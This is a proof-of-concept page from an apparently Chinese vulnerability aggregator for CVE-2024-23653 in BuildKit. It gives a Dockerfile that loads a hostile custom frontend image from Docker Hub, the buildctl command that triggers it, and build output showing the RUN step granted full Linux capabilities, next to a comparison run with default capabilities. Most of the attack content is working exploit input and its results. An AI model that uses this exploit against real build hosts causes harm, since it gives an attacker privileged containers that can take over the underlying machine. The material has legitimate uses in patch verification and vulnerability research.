POC详情: 6e5d3c5a164d484fedd9fc607728ae3ce55938f0

来源
关联漏洞
标题: BuildKit 安全漏洞 (CVE-2024-23653)
描述:BuildKit是并发、高速缓存高效且与 Dockerfile 无关的构建器工具包。 BuildKit v0.12.4版本及之前版本存在安全漏洞。攻击者利用该漏洞可以使用 API 来提升权限运行容器。
介绍
```dockerfile
#syntax=docker.io/zdfa/evilerfile
FROM alpine
RUN grep Cap /proc/self/status
```

```shell
sudo bin/buildctl build \
    --frontend=dockerfile.v0 \
    --local context=. \
    --local dockerfile=.
```

```
➜  cp sudo bin/buildctl build \
    --frontend=dockerfile.v0 \
    --local context=. \
    --local dockerfile=.
[+] Building 5.3s (6/6) FINISHED
 => [internal] load .dockerignore                                                                                                                                                      0.0s
 => => transferring context: 2B                                                                                                                                                        0.0s
 => [internal] load build definition from Dockerfile                                                                                                                                   0.0s
 => => transferring dockerfile: 114B                                                                                                                                                   0.0s
 => resolve image config for docker.io/zdfa/evilerfile:latest                                                                                                                          1.0s
 => CACHED docker-image://docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                            0.0s
 => => resolve docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                                       0.0s
 => docker-image://docker.io/library/alpine:latest                                                                                                                                     4.0s
 => => resolve docker.io/library/alpine:latest                                                                                                                                         4.0s
 => [auth] library/alpine:pull token for registry-1.docker.io                                                                                                                          0.0s
Dockerfile:1
--------------------
   1 | >>> #syntax=docker.io/zdfa/evilerfile
   2 |     FROM alpine
   3 |     RUN grep Cap /proc/self/status
--------------------
error: failed to solve: grep Cap /proc/self/status
grep Cap /proc/self/status
% grep Cap /proc/self/status
CapInh: 000001ffffffffff
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 000001ffffffffff
% exit 99

: exit code: 99
^[[44;3R%
```

```dockerfile
#syntax=docker.io/zdfa/evilerfile
FROM alpine as sandbox
RUN grep Cap /proc/self/status
```
```shell
➜  cp sudo bin/buildctl build \
    --frontend=dockerfile.v0 \
    --local context=. \
    --local dockerfile=.
[+] Building 2.8s (7/7) FINISHED
 => [internal] load build definition from Dockerfile                                                                                                                                   0.1s
 => => transferring dockerfile: 125B                                                                                                                                                   0.0s
 => [internal] load .dockerignore                                                                                                                                                      0.0s
 => => transferring context: 2B                                                                                                                                                        0.0s
 => resolve image config for docker.io/zdfa/evilerfile:latest                                                                                                                          2.0s
 => [auth] zdfa/evilerfile:pull token for registry-1.docker.io                                                                                                                         0.0s
 => CACHED docker-image://docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                            0.0s
 => => resolve docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                                       0.0s
 => CACHED docker-image://docker.io/library/alpine:latest                                                                                                                              0.5s
 => => resolve docker.io/library/alpine:latest                                                                                                                                         0.5s
 => [auth] library/alpine:pull token for registry-1.docker.io                                                                                                                          0.0s
Dockerfile:1
--------------------
   1 | >>> #syntax=docker.io/zdfa/evilerfile
   2 |     FROM alpine as sandbox
   3 |     RUN grep Cap /proc/self/status
--------------------
error: failed to solve: grep Cap /proc/self/status
grep Cap /proc/self/status
% grep Cap /proc/self/status
CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
% exit 99

: exit code: 99
^[[44;3R%
```
文件快照

[4.0K] /data/pocs/6e5d3c5a164d484fedd9fc607728ae3ce55938f0 ├── [4.0K] cmd │   └── [4.0K] eviler │   └── [3.8K] main.go ├── [ 300] Dockerfile ├── [ 122] go.mod ├── [322K] go.sum └── [5.4K] README.md 2 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。